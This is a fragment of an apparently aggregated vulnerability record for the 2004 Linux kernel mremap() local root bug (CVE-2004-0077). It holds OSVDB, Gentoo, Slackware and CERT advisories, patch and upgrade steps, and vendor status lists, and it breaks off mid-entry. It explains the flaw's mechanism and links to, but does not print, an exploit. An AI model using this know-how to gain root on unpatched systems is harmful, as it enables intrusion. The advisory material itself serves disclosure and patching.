(GNU/Linux)\r\n\r\niD8DBQFAM1QzC+8U3Z5wpu4RAqXzAKCMOkFu1mXzzRgLyuFYp4ORpQCQDgCfe4M2\r\n3IjbGvzniOjv/Hc7KKAzMtU=\r\n=GJds\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.netsys.com/full-disclosure-charter.html", "edition": 1, "modified": "2004-02-18T00:00:00", "published": "2004-02-18T00:00:00", "id": "SECURITYVULNS:DOC:5788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5788", "title": "[Full-Disclosure] Second critical mremap() bug found in all Linux kernels", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0077"], "edition": 1, "description": "## Vulnerability Description\nThe Linux kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges due to improper checks on return values performed in the do_mremap function for the mremap system call. This flaw may lead to a loss of Confidentiality, Integrity and Availability.\n\n## Solution Description\nUpgrade to version 2.4.25 or higher, or 2.6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nThe Linux kernel contains a flaw that may allow a malicious user to gain access to unauthorized privileges due to improper checks on return values performed in the do_mremap function for the mremap system call. This flaw may lead to a loss of Confidentiality, Integrity and Availability.\n\n## References:\nVendor URL: http://www.kernel.org/\nVendor Specific Solution URL: http://distro.conectiva.com/atualizacoes/index.php?id=a&anuncio=000820\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-438\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-444\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-454\nVendor Specific Solution URL: http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015\nVendor Specific Solution URL: http://www.slackware.org/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-440\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-456\nVendor Specific Solution URL: http://www.turbolinux.com/security/2004/TLSA-2004-7.txt\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-442\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-450\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-466\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-470\nVendor Specific Solution URL: http://www.suse.de/de/security/2004_05_linux_kernel.html\nVendor Specific Solution URL: http://lists.trustix.org/pipermail/tsl-announce/2004-February/000218.html\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-439\nVendor Specific Solution URL: http://www.debian.org/security/2004/dsa-475\nVendor Specific Solution URL: http://www.gentoo.org/security/en/glsa/glsa-200403-02.xml/MSS-OAR-E01-2004.0290.1\nVendor Specific Solution URL: http://mail.immunix.com/pipermail/immunix-announce/2004-February/0102.html\nVendor Specific Solution URL: http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015-1\n[Vendor Specific Advisory URL](http://smoothwall.org/security/advisories/SWP-2004.002.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-069.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-106.html)\n[Vendor Specific Advisory URL](https://rhn.redhat.com/errata/RHSA-2004-065.html)\nSecurity Tracker: 1009095\n[Secunia Advisory ID:10897](https://secuniaresearch.flexerasoftware.com/advisories/10897/)\n[Secunia Advisory ID:11276](https://secuniaresearch.flexerasoftware.com/advisories/11276/)\nOther Advisory URL: http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\nISS X-Force ID: 15244\nGeneric Exploit URL: http://www.packetstormsecurity.org/0403-exploits/isec-0014-mremap-unmap.v2.txt\n[CVE-2004-0077](https://vulners.com/cve/CVE-2004-0077)\nCIAC Advisory: o-082\nCIAC Advisory: o-094\nCIAC Advisory: o-126\nCERT VU: 981222\nBugtraq ID: 9686\n", "modified": "2004-02-18T09:15:42", "published": "2004-02-18T09:15:42", "href": "https://vulners.com/osvdb/OSVDB:3986", "id": "OSVDB:3986", "type": "osvdb", "title": "Linux Kernel mremap() Missing Return Value Checking\n Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:49", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "edition": 1, "description": "### Background\n\nThe Linux kernel is responsible for memory management in a working system - to allow this, processes are allowed to allocate and unallocate memory. \n\n### Description\n\nThe memory subsystem allows for shrinking, growing, and moving of chunks of memory along any of the allocated memory areas which the kernel posesses. \n\nTo accomplish this, the do_mremap code calls the do_munmap() kernel function to remove any old memory mappings in the new location - but, the code doesn't check the return value of the do_munmap() function which may fail if the maximum number of available virtual memory area descriptors has been exceeded. \n\nDue to the missing return value check after trying to unmap the middle of the first memory area, the corresponding page table entries from the second new area are inserted into the page table locations described by the first old one, thus they are subject to page protection flags of the first area. As a result, arbitrary code can be executed. \n\n### Impact\n\nArbitrary code with normal non-super-user privelerges may be able to exploit this vulnerability and may disrupt the operation of other parts of the kernel memory management subroutines finally leading to unexpected behavior. \n\nSince no special privileges are required to use the mremap() and mummap() system calls any process may misuse this unexpected behavior to disrupt the kernel memory management subsystem. Proper exploitation of this vulnerability may lead to local privilege escalation allowing for the execution of arbitrary code with kernel level root access. \n\nProof-of-concept exploit code has been created and successfully tested, permitting root escalation on vulnerable systems. As a result, all users should upgrade their kernels to new or patched versions. \n\n### Workaround\n\nUsers who are unable to upgrade their kernels may attempt to use \"sysctl -w vm.max_map_count=1000000\", however, this is a temporary fix which only solves the problem by increasing the number of memory areas that can be created by each process. Because of the static nature of this workaround, it is not recommended and users are urged to upgrade their systems to the latest avaiable patched sources. \n\n### Resolution\n\nUsers are encouraged to upgrade to the latest available sources for their system: \n \n \n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n \n # # IF YOUR KERNEL IS MARKED as \"remerge required!\" THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.", "modified": "2006-05-22T00:00:00", "published": "2004-03-05T00:00:00", "id": "GLSA-200403-02", "href": "https://security.gentoo.org/glsa/200403-02", "type": "gentoo", "title": "Linux kernel do_mremap local privilege escalation vulnerability", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2019-05-30T07:36:58", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "New kernels are available for Slackware 9.1 and -current to fix\na bounds-checking problem in the kernel's mremap() call which\ncould be used by a local attacker to gain root privileges.\nPlease note that this is not the same issue as CAN-2003-0985\nwhich was fixed in early January.\n\nThe kernels in Slackware 8.1 and 9.0 that were updated in\nJanuary are not vulnerable to this new issue because the patch\nfrom Solar Designer that was used to fix the CAN-2003-0985 bugs\nalso happened to fix the problem that was discovered later.\n\nSites running Slackware 9.1 or -current should upgrade to a\nnew kernel. After installing the new kernel, be sure to run\n'lilo'.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077\n\n\nHere are the details from the Slackware 9.1 ChangeLog:\n\nWed Feb 18 03:44:42 PST 2004\npatches/kernels/: Recompiled to fix another bounds-checking error in\n the kernel mremap() code. (this is not the same issue that was fixed\n on Jan 6) This bug could be used by a local attacker to gain root\n privileges. Sites should upgrade to a new kernel. After installing\n the new kernel, be sure to run 'lilo'.\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0077\n Thanks to Paul Starzetz for finding and researching this issue.\n (* Security fix *)\npatches/packages/kernel-ide-2.4.24-i486-2.tgz: Patched, recompiled.\n (* Security fix *)\npatches/packages/kernel-source-2.4.24-noarch-2.tgz: Patched the kernel\n source with a fix for the mremap() problem from Solar Designer, and\n updated the Speakup driver (not pre-applied).\n (* Security fix *)\n\nWHERE TO FIND THE NEW PACKAGES:\n\nUpdated packages for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-ide-2.4.24-i486-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/kernel-source-2.4.24-noarch-2.tgz\n\nAn alternate kernel may be installed. Those are found in this directory:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/kernels/\n\n\nUpdated packages for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/kernel-ide-2.4.24-i486-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/k/kernel-source-2.4.24-noarch-2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-current/bootdisks/\nftp://ftp.slackware.com/pub/slackware/slackware-current/kernels/\n\n\nMD5 SIGNATURES:\n\nMD5 signatures may be downloaded from our FTP server:\n\n\nSlackware 9.1 packages:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/CHECKSUMS.md5\n\nTo verify authenticity, this file has been signed with the Slackware\nGPG key (use 'gpg --verify'):\n\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/CHECKSUMS.md5.asc\n\n\nSlackware -current packages:\nftp://ftp.slackware.com/pub/slackware/slackware-current/CHECKSUMS.md5\nftp://ftp.slackware.com/pub/slackware/slackware-current/CHECKSUMS.md5.asc\n\n\nINSTALLATION INSTRUCTIONS:\n\nUse upgradepkg to install the new kernel package.\nAfter installing the kernel-ide package you will need to run lilo ('lilo' at\na command prompt) or create a new system boot disk ('makebootdisk'), and\nreboot.\n\nIf desired, a kernel from the kernels/ directory may be used instead. For\nexample, to use the kernel in kernels/scsi.s/, you would copy it to the\nboot directory like this:\n\ncd kernels/scsi.s\ncp bzImage /boot/vmlinuz-scsi.s-2.4.24\n\nCreate a symbolic link:\nln -sf /boot/vmlinuz-scsi.s-2.4.24 /boot/vmlinuz\n\nThen, run 'lilo' or create a new system boot disk and reboot.", "modified": "2004-02-18T04:37:55", "published": "2004-02-18T04:37:55", "id": "SSA-2004-049-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911", "type": "slackware", "title": "Kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:44:02", "bulletinFamily": "info", "cvelist": ["CVE-2003-0985", "CVE-2004-0077"], "description": "### Overview \n\nA vulnerability in the Linux `mremap(2)` system call could allow an authenticated, local attacker to execute arbitrary code with root privileges.\n\n### Description \n\nThe Linux kernel uses a linked list of vitrual memory area (VMA) descriptors to reference valid regions of the page table for a given process. VMA descriptors include information about the memory area such as start address, length, and page protection flags. A VMA effectively contains a range of page table entries (PTEs) that make up part of the page table.\n\nThe `mremap(2)` system call has the ability to resize or move a VMA or part of a VMA within a process' memory space. `mremap(2)` contains a function called `do_munmap()` that is used to unmap regions of memory during resize or move operations. There is a limit on the number of VMA descriptors that can exist at one time, and `do_munmap()` does not create a new VMA descriptor if doing so would exceed this limit. \n \nIn certain cases, `mremap(2)` does not properly check the return value from the `do_munmap()` function, and will map PTEs to new locations even though the expected VMAs have not been created or updated. By carefully manipulating VMA to PTE relationships, a local attacker can read from or write to memory owned by a process running with different privileges. \n \nFurther technical details are available in an [advisory](<http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt>) from iSEC. Note that this vulnerability is distinct from the one described in VU#490620/CAN-2003-0985. \n \n--- \n \n### Impact \n\nAn authenticated, local attacker could execute arbitrary code with root privileges. \n \n--- \n \n### Solution \n\n**Patch or Upgrade** \n \nApply a patch or upgrade as specified by your vendor. This issue is resolved in Linux kernels [2.2.26](<http://www.kernel.org/pub/linux/kernel/v2.2/ChangeLog-2.2.26>), [2.4.25](<http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.25>), and [2.6.3](<http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.3>) from the [Linux Kernel Archives](<http://www.kernel.org/>). \n \n--- \n \n### Vendor Information\n\n981222\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Astaro __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [Up2Date 4.021 #35996](<http://www.astaro.org/showflat.php?Cat=&Number=35996>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Conectiva __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CLSA-2004:820](<http://distro.conectiva.com.br/atualizacoes/index.php?id=a&anuncio=000820&idioma=en>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Debian __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have fixed this problem for our various kernels in the following advisories: \n \n<http://www.debian.org/security/2004/dsa-456> \n<http://www.debian.org/security/2004/dsa-454> \n<http://www.debian.org/security/2004/dsa-453> \n<http://www.debian.org/security/2004/dsa-450> \n<http://www.debian.org/security/2004/dsa-444> \n<http://www.debian.org/security/2004/dsa-442> \n<http://www.debian.org/security/2004/dsa-440> \n<http://www.debian.org/security/2004/dsa-439> \n<http://www.debian.org/security/2004/dsa-441> \n<http://www.debian.org/security/2004/dsa-438>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fedora Legacy Project __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FLSA:1284](<http://www.fedoralegacy.org/updates/RH7.2/2004-03-02-FLSA_2004_1284__Updated_kernel_resolves_security_vulnerabilities.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fedora Project __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [FEDORA-2004-080](<http://www.redhat.com/archives/fedora-announce-list/2004-February/msg00025.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Gentoo Linux __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [GLSA 200403-02](<http://forums.gentoo.org/viewtopic.php?t=145828>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Linux Kernel Archives __ Affected\n\nUpdated: March 10, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue is resolved in Linux kernels [2.2.26](<http://www.kernel.org/pub/linux/kernel/v2.2/ChangeLog-2.2.26>), [2.4.25](<http://www.kernel.org/pub/linux/kernel/v2.4/ChangeLog-2.4.25>), and [2.6.3](<http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.3>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Linux Netwosix __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [LNSA-#2004-0003](<http://www.netwosix.org/adv03.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### MandrakeSoft __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MDKSA-2004:015](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015>) and [MDKSA-2004:015-1](<http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2004:015-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNo supported release of Openwall GNU/*/Linux (Owl) was affected by this vulnerability as of the time it was made public. We had the bug proactively fixed in Owl 1.1 release (Linux kernel 2.4.23-ow2), not realizing its full security impact at the time.\n\nAlthough those are no longer a part of Owl (not in Owl 1.1), we continue to maintain security hardening patches for Linux 2.2.x kernels and make them available for the public. Linux 2.2.x was affected by a variation of this vulnerability and thus, as a service to the community, we had included a workaround in Linux 2.2.25-ow2 patch. Linux 2.2.26 now includes the same change.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Red Hat Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nUpdates to correct this issue were made available for Red Hat Linux and Red Hat Enterprise Linux. Users of the Red Hat Network can update their systems using the 'up2date' tool. \n \nRed Hat Linux 9: \n\n\n \n<http://rhn.redhat.com/errata/RHSA-2004-065.html>Red Hat Enterprise Linux 3: \n\n\n<http://rhn.redhat.com/errata/RHSA-2004-066.html>Red Hat Enterprise Linux 2.1: \n\n\n<http://rhn.redhat.com/errata/RHSA-2004-069.html>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SGI __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [20040204-01-U](<ftp://patches.sgi.com/support/free/security/advisories/20040204-01-U.asc>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Slackware __ Affected\n\nUpdated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SSA:2004-049-01](<http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.541911>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SmoothWall __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SWL-2004:002](<http://www.smoothwall.net/support/advisories/SWL-2004.002.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### SuSE Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SuSE-SA:2004:005](<http://www.suse.de/de/security/2004_05_linux_kernel.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe following Sun products are vulnerable.\n\nJava Desktop System Version 2003. \n \nA patch is available to customers via the on-line update mechanism in JDS. Please see <http://wwws.sun.com/software/javadesktopsystem/update/index.html> for further details. \n \nSun Cobalt legacy products: \n \nRaQ4 \nRaQXTR \nQube3 \nRaQ550 \n \nSun will be publishing Sun Alerts for this issue which will be available from the following location: \n \n[http://sunsolve.Sun.COM/pub-cgi/search.pl?mode=results&so=date&coll=fsalert&zone_32=category:security](<http://sunsolve.Sun.COM/pub-cgi/search.pl?mode=results&so=date&coll=fsalert&zone_32=category:security>) \n \nThe Sun Alerts will be updated with the patch information as soon as patches are available.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Trustix __ Affected\n\nUpdated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see TSLSA-2004-0007 (Trustix 2.0, kernel 2.4.24) and TSLSA-2004-0008 (Trustix 1.5, kernel 2.2.25).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### TurboLinux __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis Vulnerability is fixed by TLSA-2004-7. \n\n\nPlease refer to \n<http://www.turbolinux.com/security/2004/TLSA-2004-7.txt>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Wirex __ Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [IMNX-2004-7+-001-01](<http://mail.immunix.com/pipermail/immunix-announce/2004-February/0102.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Apple Computer Inc. __ Not Affected\n\nNotified: March 10, 2004 Updated: March 11, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nApple: Not Vulnerable\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. is not affected by the problem in VU#981222 because it does not support the mremap.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### NetBSD __ Not Affected\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nNetBSD is not affected.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### EMC Corporation Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Guardian Digital Inc. Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### IBM __ Unknown\n\nNotified: March 10, 2004 Updated: March 25, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nIBM eServer Platform Response\n\nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to [https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/security=alerts?OpenDocument&pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/security=alerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to <http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be reffered to [servsec@us.ibm.com](<mailto:servsec@us.ibm.com>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23981222 Feedback>).\n\n### Juniper Networks Unknown\n\nUpdated: March 11, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 